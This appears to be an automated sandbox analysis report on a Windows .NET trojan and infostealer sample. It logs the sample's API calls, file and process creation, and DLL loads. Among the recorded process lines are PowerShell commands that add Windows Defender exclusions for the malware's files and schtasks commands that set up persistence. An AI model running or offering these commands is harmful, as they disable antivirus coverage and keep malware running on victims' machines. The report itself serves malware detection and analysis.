Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/19@3/4

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File created: C:\Users\user\AppData\Roaming\yxXYABHh.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File created: C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp

Jump to behavior

Source: PvAmrCZENy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PvAmrCZENy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002839000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002849000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.000000000287C000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002889000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002857000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000309A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000003068000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000304A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000308E000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.000000000305A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PvAmrCZENy.exe	Virustotal: Detection: 77%
Source: PvAmrCZENy.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File read: C:\Users\user\Desktop\PvAmrCZENy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\yxXYABHh.exe C:\Users\user\AppData\Roaming\yxXYABHh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PvAmrCZENy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\yxXYABHh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp4DA1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process created: C:\Users\user\Desktop\PvAmrCZENy.exe "C:\Users\user\Desktop\PvAmrCZENy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yxXYABHh" /XML "C:\Users\user\AppData\Local\Temp\tmp5E89.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process created: C:\Users\user\AppData\Roaming\yxXYABHh.exe "C:\Users\user\AppData\Roaming\yxXYABHh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: netutils.dll	Jump to behavior
